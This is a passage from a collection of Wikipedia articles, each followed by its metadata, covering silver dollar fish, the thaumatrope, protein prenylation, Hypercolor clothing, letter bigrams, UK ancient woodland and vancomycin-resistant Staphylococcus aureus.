The silver dollar is listed as semi-aggressive, but some silver dollars can be very mellow. These fish can be kept in community tanks with fish too large to fit in their mouths, and once fully grown, they can be kept with larger fish like oscars, pikes, and larger catfish.

Breeding

The best way to acquire a breeding pair is to purchase a half dozen juvenile silver dollars and raise them together. The parents will not consume the eggs or fry, although other fish will, so when spawning them it is wise to place them in a separate tank. To facilitate spawning, make sure the water is soft (8 dGH or below) and warm (80 to 82 °F), keep the lighting dim, and provide fine-leaved plants. Eventually a pair will spawn, and the female will lay up to 2,000 eggs. The eggs will fall to the bottom of the tank, where they will hatch in three days. After approximately a week, the fry will be free swimming and able to eat fine foods such as commercially prepared fry food, finely crushed spirulina, or freshly hatched brine shrimp.

Silver dollar species

Metynnis altidorsalis
Metynnis argenteus (Silver dollar)
Metynnis fasciatus (Striped silver dollar)
Metynnis guaporensis
Metynnis hypsauchen (Schreitmüller's silver dollar, Striped silver dollar)
Metynnis lippincottianus (Spotted silver dollar)
Metynnis luna (Red-spot silver dollar)
Metynnis maculatus (Speckled silver dollar)
Metynnis mola
Metynnis otuquensis
Myloplus rubripinnis (Red hook silver dollar)
Myloplus schomburgkii (Black-barred silver dollar)
Mylossoma duriventre (Silver mylossoma, Hard-bellied silver dollar)

Hard bellies are silvery and somewhat transparent; they are the most commonly encountered species.

See also List of freshwater aquarium fish species References Serrasalmidae Fish common names Paraphyletic groups
Silver dollar (fish)
[ "Biology" ]
668
[ "Phylogenetics", "Paraphyletic groups" ]
1,064,372
https://en.wikipedia.org/wiki/Thaumatrope
A thaumatrope is an optical toy that was popular in the 19th century. A disk with a picture on each side is attached to two pieces of string. When the strings are twirled quickly between the fingers the two pictures appear to blend into one. The toy has traditionally been thought to demonstrate the principle of persistence of vision, a disputed explanation for the cause of illusory motion in stroboscopic animation and film. Examples of common thaumatrope pictures include a bare tree on one side of the disk, and its leaves on the other, or a bird on one side and a cage on the other. Many classic thaumatropes also included riddles or short poems, with one line on each side. Thaumatropes can provide an illusion of motion with the two sides of the disc each depicting a different phase of the motion, but no examples are known to have been produced until long after the introduction of the first widespread animation device: the phenakistiscope. Thaumatropes are often seen as important antecedents of motion pictures and in particular of animation. The name translates roughly as "wonder turner", from θαῦμα "wonder" and τρόπος "turn".

Invention

A 2012 paper argues that a prehistoric bone disk found in the Laugerie-Basse rockshelter is a thaumatrope, designed to be spun using leather thongs threaded through the central perforation. The invention of the thaumatrope is usually credited to British physician John Ayrton Paris. He described the device in his 1827 educational book for children Philosophy in Sport Made Science in Earnest, with an illustration by George Cruikshank. British mathematician Charles Babbage recalled in 1864 that the thaumatrope was invented by the geologist William Henry Fitton. Babbage had told Fitton how the astronomer John Herschel had challenged him to show both sides of a shilling at once. Babbage held the coin in front of a mirror, but Herschel showed how both sides were visible when the coin was spun on the table. A few days later Fitton brought Babbage a new illustration of the principle, consisting of a round disc of card suspended between two pieces of sewing silk. This disc had a parrot on one side and a cage at the other side. Babbage and Fitton made several different designs and amused some friends with them for a short while. They forgot about it until some months later they heard about the "wonderful invention of Dr. Paris". French artist Antoine Claudet stated in 1867 that he had heard that Paris had once been present when Herschel demonstrated his rotating coin trick to his children and subsequently got the idea for the thaumatrope. Claudet also noted in 1867 that the thaumatrope could create a three-dimensional illusion. A spinning rectangular thaumatrope with the alternating letters of the name "Victoria" on each side showed the full word with the letters at two different distances from the observer's eye. If the two strings of the thaumatrope are attached to the same side of the card, the thickness of the card accounts for a small difference in the distances when each side is visible.

Commercial production

The first commercial thaumatrope was registered at Stationers' Hall on 2 April 1825 and published by W. Phillips in London as The Thaumatrope; being Rounds of Amusement or How to Please and Surprise By Turns, sold in boxes of 12 or 18 discs. It included a sheet with mottoes or riddles for each disc, often with a political meaning.
Paris was widely regarded as the author, but wasn't mentioned on the product or its packaging and he later claimed in a letter to Michael Faraday "I was first induced to publish it, at the earnest desire of my late friend Wm Phillips. (...) I may add that I never put my name to it". The steep price of a set (seven shillings for 12 discs or half a guinea for 18) was criticized; half a guinea would have been about a week's pay for an average worker. It was also defended: its inventor should be able to earn something from his invention while it was new, before it was widely copied, as had been seen before with the kaleidoscope. Paris later claimed he gained £150 from its sales in the United Kingdom. As expected, pirate copies soon became common and were much cheaper. For instance the 'Thaumatropical Amusement' was available in boxes of six discs for one shilling. Although the toy became very popular, original copies are now very rare; only one extant set produced by W. Phillips is currently known (in the Richard Balzer collection) and one single disc is at the Cinématheque Française. Other early publishers across the continent included Alphonse Giroux & Compagnie in France and Trentsensky in Austria. In 1833 these companies would be the very first publishers of the next big "philosophical toy" craze: the Phénakisticope.

Animation

In the first 1827 edition of "Philosophy in Sport" John Ayrton Paris described a version with a circular frame around the disc through which the strings were threaded. A little tug on the strings would cause a minor change in the axis of rotation and thus a slight shift in the position of the images while revolving. An adapted version of the standard horse and jockey thaumatrope could thus first show the jockey on the horse before being thrown over its head. In a new 1833 edition of the book this example was replaced with a version without a ring but with an elastic string added to change the axis by pulling it. This version showed a drinking man lowering and raising a bottle to and from his mouth, with an illustration of the different sides of the disc and the different states of the resulting image. Several other examples were described in the book. The balls of a juggler could appear as in motion and the two painted balls could be seen as three or four when the axis of rotation was shifted. A tailor in a pulpit next to a pond with a goose fluttering in the water would have the tailor falling into the water and the goose taking his place in the pulpit. No commercially produced versions with these techniques are known. On 26 November 1869 the Rev. Richard Pilkington received "Useful Registered Design Number 5074" for his Pedemascope. This was a variation of the thaumatrope. It had a card with pictures "painted in two different positions on both sides". This card was placed in the two-part mahogany holder with a handle and a brass pin that would semi-rotate the card when it was twirled (a bit of iron preventing full rotation). Transparent or cut-out variations were suggested for use with the magic lantern. In 1892 mechanical engineer Thomas E. Bickle received British Patent No. 20,281 for a clockwork thaumatrope with "pictures or designs exhibiting some action or motion in two phases, which are thus alternately presented to the eye in rapid succession with small intervals of rest".
Thaumatropes in popular culture

The 1827 book Philosophy in Sport made Science in Earnest, being an attempt to illustrate the first principles of natural philosophy by the aid of popular toys and sports featured the thaumatrope and warned against inferior copies. The chapter head was illustrated with a drawing by George Cruikshank, depicting a man demonstrating the thaumatrope to a girl and a boy. It was first published anonymously, but posthumous editions were credited to John Ayrton Paris.

In the 1999 Tim Burton film Sleepy Hollow, a bird and cage thaumatrope is demonstrated by Johnny Depp's character.
In the 2006 Christopher Nolan film The Prestige, Michael Caine's character repeatedly uses a thaumatrope as a way of explaining persistence of vision.
In the 2011 Martin Scorsese film Hugo, the final scene begins in the middle of a conversation about cinema precursors, including the thaumatrope.
In the 2013 video game BioShock Infinite, the bird and cage thaumatrope is used several times.
In the 2022 film The Wonder, a thaumatrope is featured frequently throughout the film.
In the 2023 film Gaslight, a thaumatrope is used.

See also Strobe light References External links A collection of animated thaumatropes – The Richard Balzer Collection Demonstration BBC Film Network – The Persistent Resistance of Vision – short film parodying the thaumatrope Demonstration of an antique/early thaumatrope Audiovisual introductions in 1824 Animation techniques History of animation Optical illusions Novelty items Optical toys
Thaumatrope
[ "Physics" ]
1,762
[ "Optical phenomena", "Physical phenomena", "Optical illusions" ]
1,064,373
https://en.wikipedia.org/wiki/Prenylation
Prenylation (also known as isoprenylation or lipidation) is the addition of hydrophobic molecules to a protein or a biomolecule. It is usually assumed that prenyl groups (3-methylbut-2-en-1-yl) facilitate attachment to cell membranes, similar to lipid anchors like the GPI anchor, though direct evidence of this has not been observed. Prenyl groups (also called isoprenyl groups, having one hydrogen atom more than isoprene) have been shown to be important for protein–protein binding through specialized prenyl-binding domains.

Protein prenylation

Protein prenylation involves the transfer of either a farnesyl or a geranylgeranyl moiety to C-terminal cysteine(s) of the target protein. Three enzymes carry out prenylation in the cell: farnesyltransferase, geranylgeranyltransferase I, and Rab geranylgeranyltransferase (geranylgeranyltransferase II). Farnesylation is a type of prenylation, a post-translational modification of proteins by which an isoprenyl group is added to a cysteine residue. It is an important process to mediate protein–protein interactions and protein–membrane interactions.

Prenylation sites

There are at least 3 types of sites that are recognized by prenylation enzymes. The CaaX motif is found at the COOH-terminus of proteins, such as lamins or Ras. The motif consists of a cysteine (C), two aliphatic amino acids ("aa") and some other terminal amino acid ("X"). If the X position is serine, alanine, or methionine, the protein is farnesylated. For instance, in rhodopsin kinase the sequence is CVLS. If X is leucine, the protein is geranylgeranylated. The second motif for prenylation is CXC, which, in the Ras-related protein Rab3A, leads to geranylgeranylation on both cysteine residues and methyl esterification. The third motif, CC, is also found in Rab proteins, where it appears to direct only geranylgeranylation but not carboxyl methylation. Carboxyl methylation only occurs on prenylated proteins.

Farnesyltransferase and geranylgeranyltransferase I

Farnesyltransferase and geranylgeranyltransferase I are very similar proteins. They consist of two subunits, the α-subunit, which is common to both enzymes, and the β-subunit, whose sequence identity is just 25%. These enzymes recognise the CaaX box at the C-terminus of the target protein. C is the cysteine that is prenylated, a is any aliphatic amino acid, and the identity of X determines which enzyme acts on the protein. Farnesyltransferase recognizes CaaX boxes where X = M, S, Q, A, or C, whereas geranylgeranyltransferase I recognizes CaaX boxes with X = L or E.

Rab geranylgeranyl transferase

Rab geranylgeranyltransferase, or geranylgeranyltransferase II, transfers (usually) two geranylgeranyl groups to the cysteine(s) at the C-terminus of Rab proteins. The C-terminus of Rab proteins varies in length and sequence and is referred to as hypervariable. Thus Rab proteins do not have a consensus sequence, such as the CAAX box, which the Rab geranylgeranyl transferase can recognize. The Rab proteins usually terminate in a CC or CXC motif. Instead, Rab proteins are bound by the Rab escort protein (REP) over a more conserved region of the Rab protein and then presented to the Rab geranylgeranyltransferase. Once Rab proteins are prenylated, the lipid anchor(s) ensure that Rabs are no longer soluble. REP, therefore, plays an important role in binding and solubilising the geranylgeranyl groups and delivers the Rab protein to the relevant cell membrane.
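The CaaX-box rules quoted above (farnesyltransferase takes X = M, S, Q, A, or C; geranylgeranyltransferase I takes X = L or E) lend themselves to a toy classifier; in the Python sketch below, the residue set used for the two aliphatic "a" positions is an illustrative assumption, since real enzyme specificity is looser than any fixed list.

# Toy CaaX-box classifier based on the rules described in the text.
ALIPHATIC = set("AVLIGM")   # assumed residues for the "aa" positions

def classify_caax(sequence: str) -> str:
    tail = sequence[-4:].upper()
    if len(tail) != 4 or tail[0] != "C":
        return "no CaaX box"
    if tail[1] not in ALIPHATIC or tail[2] not in ALIPHATIC:
        return "no CaaX box"
    x = tail[3]
    if x in "MSQAC":
        return "farnesylated (farnesyltransferase)"
    if x in "LE":
        return "geranylgeranylated (geranylgeranyltransferase I)"
    return "CaaX-like, substrate unclear"

print(classify_caax("MKKCVLS"))   # rhodopsin kinase tail CVLS -> farnesylated
print(classify_caax("MKKCVLL"))   # X = L -> geranylgeranylated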
Substrates

Both isoprenoid chains, geranylgeranyl pyrophosphate (GGpp) and farnesyl pyrophosphate, are products of the HMG-CoA reductase pathway. The product of HMG-CoA reductase is mevalonate. By combining precursors with 5 carbons, the pathway subsequently produces geranyl pyrophosphate (10 carbons), farnesyl pyrophosphate (15 carbons) and geranylgeranyl pyrophosphate (20 carbons). Two farnesyl pyrophosphate groups can also be combined to form squalene, the precursor for cholesterol. This means that statins, which inhibit HMG-CoA reductase, inhibit the production of both cholesterol and isoprenoids. Note that, in the HMG-CoA reductase/mevalonate pathway, the precursors already contain a pyrophosphate group, and isoprenoids are produced with a pyrophosphate group. There is no known enzyme activity that can carry out the prenylation reaction with the isoprenoid alcohol. However, enzymatic activity of isoprenoid kinases capable of converting isoprenoid alcohols to isoprenoid pyrophosphates has been shown. In accordance with this, farnesol and geranylgeraniol have been shown to be able to rescue effects caused by statins or nitrogenous bisphosphonates, further supporting that the alcohols can be involved in prenylation, likely via phosphorylation to the corresponding isoprenoid pyrophosphate.

Proteins that undergo prenylation include Ras, which plays a central role in the development of cancer. This suggests that inhibitors of prenylation enzymes (e.g., farnesyltransferase) may influence tumor growth. In the case of the K- and N-Ras forms of Ras, when cells are treated with farnesyltransferase inhibitors (FTIs), these forms of Ras can undergo alternate prenylation in the form of geranylgeranylation. Recent work has shown that FTIs also inhibit Rab geranylgeranyltransferase and that the success of such inhibitors in clinical trials may be as much due to effects on Rab prenylation as on Ras prenylation. Inhibitors of prenyltransferase enzymes display different specificity for the prenyltransferases, dependent upon the specific compound being utilized. In addition to GTPases, the protein kinase GRK1, also known as rhodopsin kinase (RK), has been shown to undergo farnesylation and carboxyl methylation directed by the carboxyl-terminal CVLS CaaX box sequence of the protein. The functional consequences of these post-translational modifications have been shown to play a role in regulating the light-dependent phosphorylation of rhodopsin, a mechanism involved in light adaptation.

Inhibitors

FTIs can also be used to inhibit farnesylation in parasites such as Trypanosoma brucei and malaria. Parasites seem to be more vulnerable to inhibition of farnesyltransferase than humans are. In some cases, this may be because they lack geranylgeranyltransferase I. Thus, it may be possible for the development of antiparasitic drugs to 'piggyback' on the development of FTIs for cancer research. In addition, FTIs have shown some promise in treating a mouse model of progeria, and in May 2007 a phase II clinical trial using the FTI lonafarnib was started for children with progeria. In signal transduction via G protein, palmitoylation of the α subunit, prenylation of the γ subunit, and myristoylation are involved in tethering the G protein to the inner surface of the plasma membrane so that the G protein can interact with its receptor.

Prenylation of small molecules

Small molecules can also undergo prenylation, such as in the case of prenylflavonoids and other meroterpenoids.
Prenylation of a vitamin B2 derivative (flavin mononucleotide) was recently described. Longevity and cardiac effects A 2012 study found that statin treatment increases lifespan and improves cardiac health in Drosophila by decreasing specific protein prenylation. The study concluded, "These data are the most direct evidence to date that decreased protein prenylation can increase cardiac health and lifespan in any metazoan species, and may explain the pleiotropic (non-cholesterol related) health effects of statins." A 2012 clinical trial explored the approach of inhibiting protein prenylation with some degree of success in the treatment of Hutchinson–Gilford progeria syndrome, a multisystem disorder which causes failure to thrive and accelerated atherosclerosis leading to early death. See also Myristoylation Palmitoylation Choroideremia, a genetic disease caused by the loss of REP1, REP2 almost compensates, but cannot rescue the slow onset of blindness References Further reading External links Peripheral membrane proteins Membrane biology Post-translational modification
Prenylation
[ "Chemistry" ]
1,998
[ "Membrane biology", "Gene expression", "Biochemical reactions", "Post-translational modification", "Molecular biology" ]
1,064,401
https://en.wikipedia.org/wiki/Hypercolor
Hypercolor was a line of clothing, mainly T-shirts and shorts, that changed color with heat. They were manufactured by Generra Sportswear Company of Seattle and marketed in the United States as Generra Hypercolor or Generra Hypergrafix and elsewhere as Global Hypercolor. They contained a thermochromic pigment made by Matsui Shikiso Chemical of Japan, that changed between two colors—one when cold, one when warm. The shirts were produced with several color change choices beginning in 1991. The effect could easily be permanently damaged, particularly when the clothing was washed in hotter than recommended water, ironed, bleached, or tumble-dried. Generra Sportswear Co. had originally been founded as a men's sportswear distributor and importer in Seattle in 1980. The company was sold to Texas-based Farah Manufacturing Co. in 1984 and bought back by its founders in 1989. In 1986, the company added childrenswear and womenswear items to their portfolio. They struggled to meet the overwhelming demand for Hypercolor products. Between February and May 1991 they sold $50 million in Hypercolor garments. Generra went bankrupt due to mismanagement and fading demand in 1992. The Hypercolor business for the U.S. market was sold to The Seattle T-shirt Company in 1993; Generra kept the rights for the international market. The company emerged from bankruptcy in 1995 as a licensing business. The Generra name was acquired by Public Clothing Co. of New York in 2002. Today, Generra Co. is a contemporary women's and men's apparel brand headquartered in New York City. In the early 2000s, the technique was revived by a number of apparel brands. In mid-2020, the color-changing clothing trend was revived yet again by several online retailers selling color-changing swim trunks.

Principle

Substances that can change color due to a change in temperature are called thermochromes. There are two common types of thermochromes: liquid crystals (used in mood rings) and leuco dyes (used in Hypercolor T-shirts). The color change of Hypercolor shirts is based on the combination of two colors: the color of the dyed fabric, which remains constant, and the color of the thermochromic dye. Droplets of the thermochromic dye mixture are enclosed in transparent microcapsules, a few micrometers in diameter, bound to the fibers of the fabric. The thermochromic droplets are actually a mixture of several chemicals—crystal violet lactone (the color-changing dye itself), benzotriazole (a weak acid), and a quaternary ammonium salt of a fatty acid (myristylammonium oleate) dissolved in 1-dodecanol as solvent. Together, these lead to a reversible chemical reaction in response to temperature change that produces a change of color. At low temperatures, the mixture is a solid. The weak acid forms a colored complex with the leuco dye by causing the lactone ring in the center of the dye molecule to open. At high temperatures, above the melting point of the 1-dodecanol solvent (about 24 °C), the solvent melts and the ammonium salt dissociates, allowing it to react with the weak acid. This reaction increases the pH, which leads to closing of the lactone ring of the dye to convert it to its colorless (leuco) form. Therefore, at the low temperature the color of the shirt is the combination of the color of the encapsulated colored dye with the color of the dyed fabric, while at higher temperatures the capsules become colorless and the color of the fabric prevails.

References External links Clothing brands 1990s fashion Thermochromism Color of clothing
Hypercolor
[ "Materials_science" ]
767
[ "Smart materials", "Chromism", "Thermochromism" ]
1,064,587
https://en.wikipedia.org/wiki/Bigram
A bigram or digram is a sequence of two adjacent elements from a string of tokens, which are typically letters, syllables, or words. A bigram is an n-gram for n = 2. The frequency distribution of every bigram in a string is commonly used for simple statistical analysis of text in many applications, including in computational linguistics, cryptography, and speech recognition. Gappy bigrams or skipping bigrams are word pairs which allow gaps (perhaps avoiding connecting words, or allowing some simulation of dependencies, as in a dependency grammar).

Applications

Bigrams, along with other n-grams, are used in most successful language models for speech recognition. Bigram frequency attacks can be used in cryptography to solve cryptograms. See frequency analysis. Bigram frequency is one approach to statistical language identification. Some activities in logology or recreational linguistics involve bigrams. These include attempts to find English words beginning with every possible bigram, or words containing a string of repeated bigrams, such as logogogue.

Bigram frequency in the English language

The frequency of the most common letter bigrams in a large English corpus is:

th 3.56%   of 1.17%   io 0.83%
he 3.07%   ed 1.17%   le 0.83%
in 2.43%   is 1.13%   ve 0.83%
er 2.05%   it 1.12%   co 0.79%
an 1.99%   al 1.09%   me 0.79%
re 1.85%   ar 1.07%   de 0.76%
on 1.76%   st 1.05%   hi 0.76%
at 1.49%   to 1.05%   ri 0.73%
en 1.45%   nt 1.04%   ro 0.73%
nd 1.35%   ng 0.95%   ic 0.70%
ti 1.34%   se 0.93%   ne 0.69%
es 1.34%   ha 0.93%   ea 0.69%
or 1.28%   as 0.87%   ra 0.69%
te 1.20%   ou 0.87%   ce 0.65%

See also Digraph (orthography) Letter frequency Sørensen–Dice coefficient References Formal languages Classical cryptography Natural language processing
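Counting letter bigrams of the kind tabulated above takes only a few lines; this Python sketch treats the text as a single stream of letters (ignoring spaces and punctuation), which is one simplifying assumption among several possible tokenizations.

from collections import Counter

def letter_bigrams(text):
    # Keep only alphabetic characters, then pair each letter with its successor.
    letters = [c for c in text.lower() if c.isalpha()]
    return Counter(a + b for a, b in zip(letters, letters[1:]))

counts = letter_bigrams("the theory of bigrams")
total = sum(counts.values())
for bigram, n in counts.most_common(5):
    print(f"{bigram} {100 * n / total:.1f}%")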
Bigram
[ "Mathematics", "Technology" ]
478
[ "Natural language processing", "Formal languages", "Mathematical logic", "Natural language and computing" ]
1,064,603
https://en.wikipedia.org/wiki/Ancient%20woodland
In the United Kingdom, ancient woodland is that which has existed continuously since 1600 in England, Wales and Northern Ireland (or 1750 in Scotland). The practice of planting woodland was uncommon before those dates, so a wood present in 1600 is likely to have developed naturally. In most ancient woods, the trees and shrubs have been felled periodically as part of the management cycle. Providing that the area has remained as woodland, the stand is still considered ancient. Since it may have been cut over many times in the past, ancient woodland does not necessarily contain trees that are particularly old. For many animal and plant species, ancient woodland sites provide the sole habitat. Furthermore, for many others, the conditions prevailing on these sites are much more suitable than those on other sites. Ancient woodland in the UK, like rainforest in the tropics, serves as a refuge for rare and endangered species. Consequently, ancient woodlands are frequently described as an irreplaceable resource, or 'critical natural capital'. The analogous term used in the United States, Canada and Australia (for woodlands that do contain very old trees) is "old-growth forest". Ancient woodland is formally defined on maps by Natural England and equivalent bodies. Mapping of ancient woodland has been undertaken in different ways and at different times, resulting in a variable quality and availability of data across regions, although there are some efforts to standardise and update it. Protection A variety of indirect legal protections exist for many ancient woodlands, but it is not automatically the case that any given ancient woodland is protected. Some examples of ancient woodland are nationally or locally designated, for example as Sites of Special Scientific Interest. Others lack such designations. Ancient woodlands also require special consideration when they are affected by planning applications. The National Planning Policy Framework, published in 2012, represents the British government's policy document pertaining to planning decisions affecting ancient woodlands. The irreplaceable nature of ancient woodlands is elucidated in paragraph 118 of the NPPF, which states: ‘Planning permission should be refused for development resulting in the loss or deterioration of irreplaceable habitats, including ancient woodland and the loss of aged or veteran trees found outside ancient woodland, unless the need for, and benefits of, the development in that location clearly outweigh the loss.’ Characteristics The concept of ancient woodland, characterised by high plant diversity and managed through traditional practices, was developed by the ecologist Oliver Rackham in his 1980 book Ancient Woodland, its History, Vegetation and Uses in England, which he wrote following his earlier research on Hayley Wood in Cambridgeshire. The definition of ancient woodland includes two sub-types: Ancient semi-natural woodland (ASNW) and Planted ancient woodland site (PAWS). Ancient semi-natural woodland (ASNW) is composed of native tree species that have not obviously been planted. Many of these woods also exhibit features characteristic of ancient woodland, including the presence of wildlife and structures of archaeological interest. Planted Ancient Woodland Sites (PAWS) are defined as ancient woodland sites where the native species have been partially or wholly replaced with a non-locally native species (usually but not exclusively conifers). 
These woodlands typically exhibit a plantation structure, characterized by even-aged crops of one or two species planted for commercial purposes. Many of these ancient woodlands were transformed into conifer plantations as a consequence of felling operations conducted during wartime. While PAWS sites may not possess the same high ecological value as ASNW, they often contain remnants of semi-natural species where shading has been less intense, so the gradual restoration of a more semi-natural structure through careful thinning is often possible. Since the ecological and historical values of ancient woodland were recognized, PAWS restoration has been a priority amongst many woodland owners and governmental and non-governmental agencies. Various grant schemes have also supported this endeavor. Some restored PAWS sites are now practically indistinguishable from ASNW. There is no formal method for reclassifying restored PAWS as ASNW, although some woodland managers now use the acronym RPAWS (Restored Planted Ancient Woodland) for a restored site. Species which are particularly characteristic of ancient woodland sites are called ancient woodland indicator species, such as bluebells, ramsons, wood anemone, yellow archangel and primrose, representing a type of ecological indicator. The term is more frequently applied to desiccation-sensitive plant species, and particularly lichens and bryophytes, than to animals. This is due to the slower rate at which they colonise planted woodlands, which makes them more reliable indicators of ancient woodland sites. Sequences of pollen analysis can also serve as indicators of forest continuity. Lists of ancient woodland indicator species among vascular plants were developed by the Nature Conservancy Council (now Natural England) for each region of England, with each list containing the hundred most reliable indicators for that region. The methodology entailed the study of plants from known woodland sites, with an analysis of their occurrence patterns to determine which species were most indicative of sites from before 1600. In England this resulted in the first national Ancient Woodland Inventory, produced in the 1980s. Although ancient woodland indicator species have been recorded in post-1600 woodlands and also in non-woodland sites such as hedgerows, it is uncommon for a site that is not ancient woodland to host a double-figure indicator species total. More recent methodologies also supplement these field observations and ecological measurements with historical data from maps and local records, which were not fully assessed in the original Nature Conservancy Council surveys. History Ancient woods were valuable properties for their landowners, serving as a source of wood fuel, timber (estovers and loppage) and forage for pigs (pannage). In southern England, hazel was particularly important for coppicing, whereby the branches were used for wattle and daub in buildings, for example. Such old coppice stumps are easily recognised for their current overgrown state, given the waning prevalence of the practice. In such overgrown coppice stools, large boles emerge from a common stump. The term 'forest' originally encompassed more than simply woodland. It also referred to areas such as parkland, open heathland, upland fells, and any other territory situated between or outside of manorial freehold. These forests were the exclusive hunting preserve of the monarch or granted to nobility.
The ancient woods that were situated within forests were frequently designated as Royal Parks. These were afforded special protection against poachers and other interlopers, and subject to tolls and fines where trackways passed through them or when firewood was permitted to be collected or other licenses granted. The forest law was rigorously enforced by a hierarchy of foresters, parkers and woodwards. In English land law, it was illegal to assart any part of a royal forest. This constituted the gravest form of trespass that could be committed in a forest, being considered more egregious than mere waste. While waste involved the felling of trees, which could be replanted, assarting entailed the complete uprooting of trees within the woodland of the afforested area. Boundary marking Ancient woods were well-defined, often being surrounded by a bank and ditch, which allowed them to be more easily recognised. The bank may also support a living fence of hawthorn or blackthorn to prevent livestock or deer from entering the area. Since these animals are attracted by young shoots on coppice stools as a food source, they must be excluded if the coppice is to regenerate. Such indicators can still be observed in many ancient woodlands, and large forests are often subdivided into woods and coppices with banks and ditches as was the case in the past. The hedges at the margins are often overgrown and may have spread laterally due to the neglect of many years. Many ancient woods are listed in the Domesday Book of 1086, as well as in the earlier Anglo-Saxon Chronicle. This is indicative of their significant value to early communities as a source of fuel and, moreover, as a source of food for farm animals. The boundaries are frequently described in terms of features such as large trees, streams or tracks, and even standing stones. Ancient woodland inventories Ancient woodland sites over in size are recorded in Ancient Woodland Inventories, compiled in the 1980s and 1990s by the Nature Conservancy Council in England, Wales, and Scotland; and maintained by its successor organisations in those countries. There was no inventory in Northern Ireland until the Woodland Trust completed one in 2006. Destruction Britain's ancient woodland cover has diminished considerably over time. Since the 1930s almost half of the ancient broadleaved woodland in England and Wales has been planted with conifers or cleared for agricultural use. The remaining ancient semi-natural woodlands in Britain cover a mere , representing less than 20% of the total wooded area. More than eight out of ten ancient woodland sites in England and Wales are less than in area. Only 617 exceed , which is a relatively small number. Forty-six of these sites exceed . Management Most ancient woodland in the UK has been managed in some way by humans for hundreds (in some cases probably thousands) of years. Two traditional techniques are coppicing (the practice of harvesting wood by cutting trees back to ground level) and pollarding (harvesting wood at approximately human head height to prevent new shoots being eaten by grazing species such as deer). Both techniques encourage new growth while allowing the sustainable production of timber and other woodland products. During the 20th century, the use of such traditional management techniques declined, concomitant with an increase in large-scale mechanized forestry.
Consequently, coppicing is now seldom practiced, and overgrown coppice stools are a common feature in many ancient woods, with their numerous trunks of similar size. These shifts in management practices have resulted in alterations to ancient woodland habitats and a loss of ancient woodland to forestry.

Examples

Bedgebury Forest, Kent
Bernwood Forest, Buckinghamshire and Oxfordshire
Bradfield Woods, Suffolk
Bradley Woods, Wiltshire
Burnham Beeches, Bucks
Cannock Chase, Staffordshire
Cherry Tree Wood, London
Claybury Woods, London
Coldfall Wood, London
Dolmelynllyn Estate, Gwynedd
Dyscarr Woods, Nottinghamshire
Edford Woods and Meadows, Somerset
Epping Forest, Essex
Forest of Dean, West Gloucestershire
Foxley Wood, Norfolk
Grass Wood, Wharfedale, Yorkshire
Hatfield Forest, Essex
Hazleborough Wood, Northamptonshire, part of Whittlewood Forest
Highgate Wood, London
Hollington Wood, Buckinghamshire
Holt Heath, Dorset
King's Wood, Heath and Reach, Bedfordshire
Lower Woods, Gloucestershire
New Forest, Hampshire
Parkhurst Forest, Isle of Wight
Puzzlewood, in the Forest of Dean
Queen's Wood, London
Ryton Woods, Warwickshire
Salcey Forest, Northamptonshire
Savernake Forest, Wiltshire
Sherwood Forest, Nottinghamshire
Snakes Wood, Suffolk
Titnore Wood, West Sussex
Vincients Wood, Wiltshire
Wentwood, Monmouthshire
Whinfell Forest, Cumbria
Whittlewood Forest, Northamptonshire
Windsor Great Park, Berkshire
Wistman's Wood, Devon
Wormshill, Kent: Barrows Wood, Trundle Wood and High Wood
Wyre Forest, bordering Shropshire and Worcestershire
Yardley Chase, Northamptonshire

See also References External links Ancient Tree Guides by the Woodland Trust (archived 5 November 2011) History of forestry Forests and woodlands of the United Kingdom Forests and woodlands of England Old-growth forests Forest history Types of formally designated forests
Ancient woodland
[ "Biology" ]
2,328
[ "Old-growth forests", "Ecosystems" ]
1,064,656
https://en.wikipedia.org/wiki/Vancomycin-resistant%20Staphylococcus%20aureus
Vancomycin-resistant Staphylococcus aureus (VRSA) are strains of Staphylococcus aureus that have acquired resistance to the glycopeptide antibiotic vancomycin. Bacteria can acquire resistance genes either by random mutation or through the transfer of DNA from one bacterium to another. Resistance genes interfere with the normal antibiotic function and allow bacteria to grow in the presence of the antibiotic. Resistance in VRSA is conferred by the plasmid-mediated vanA gene and operon. Although VRSA infections are uncommon, VRSA is often resistant to other types of antibiotics and a potential threat to public health because treatment options are limited. VRSA is resistant to many of the standard drugs used to treat S. aureus infections. Furthermore, resistance can be transferred from one bacterium to another.

Mechanism of acquired resistance

Vancomycin-resistant Staphylococcus aureus was first reported in the United States in 2002. To date, documented cases of VRSA have acquired resistance through uptake of a vancomycin resistance gene cluster from Enterococcus (i.e. VRE). The acquired mechanism is typically the vanA gene and operon from a plasmid in Enterococcus faecium or Enterococcus faecalis. This mechanism differs from strains of vancomycin-intermediate Staphylococcus aureus (VISA), which appear to develop elevated MICs to vancomycin through sequential mutations resulting in a thicker cell wall and the synthesis of excess amounts of D-ala-D-ala residues.

Diagnosis

The diagnosis of vancomycin-resistant Staphylococcus aureus (VRSA) is made by susceptibility testing of a single S. aureus isolate against vancomycin. This is accomplished by first assessing the isolate's minimum inhibitory concentration (MIC) using standard laboratory methods, including disc diffusion, gradient strip diffusion, and automated antimicrobial susceptibility testing systems. Once the MIC is known, resistance is determined by comparing the MIC with established breakpoints: resistant or "R" designations are assigned based on these agreed-upon values. Breakpoints are published by standards development organizations such as the U.S. Clinical and Laboratory Standards Institute, the British Society for Antimicrobial Chemotherapy and the European Committee on Antimicrobial Susceptibility Testing.

Treatment of infection

When the minimum inhibitory concentration of vancomycin is above the susceptible range, alternative antibiotics should be used. The approach is to treat with at least one agent to which the bacteria are known to be susceptible by in vitro testing. The agents that are used include daptomycin, linezolid, telavancin, ceftaroline, and quinupristin–dalfopristin. For people with methicillin-resistant Staphylococcus aureus (MRSA) bacteremia in the setting of vancomycin failure, the Infectious Diseases Society of America recommends high-dose daptomycin, if the isolate is susceptible, in combination with another agent (e.g., gentamicin, rifampin, linezolid, trimethoprim/sulfamethoxazole, or a beta-lactam antibiotic).

History

Three classes of vancomycin-resistant S. aureus have emerged that differ in vancomycin susceptibilities: vancomycin-intermediate S. aureus (VISA), heterogeneous vancomycin-intermediate S. aureus (hVISA), and high-level vancomycin-resistant S. aureus (VRSA).

Vancomycin-intermediate S. aureus (VISA)

Vancomycin-intermediate S. aureus (VISA) was first identified in Japan in 1996 and has since been found in hospitals elsewhere in Asia, as well as in the United Kingdom, France, the U.S., and Brazil.
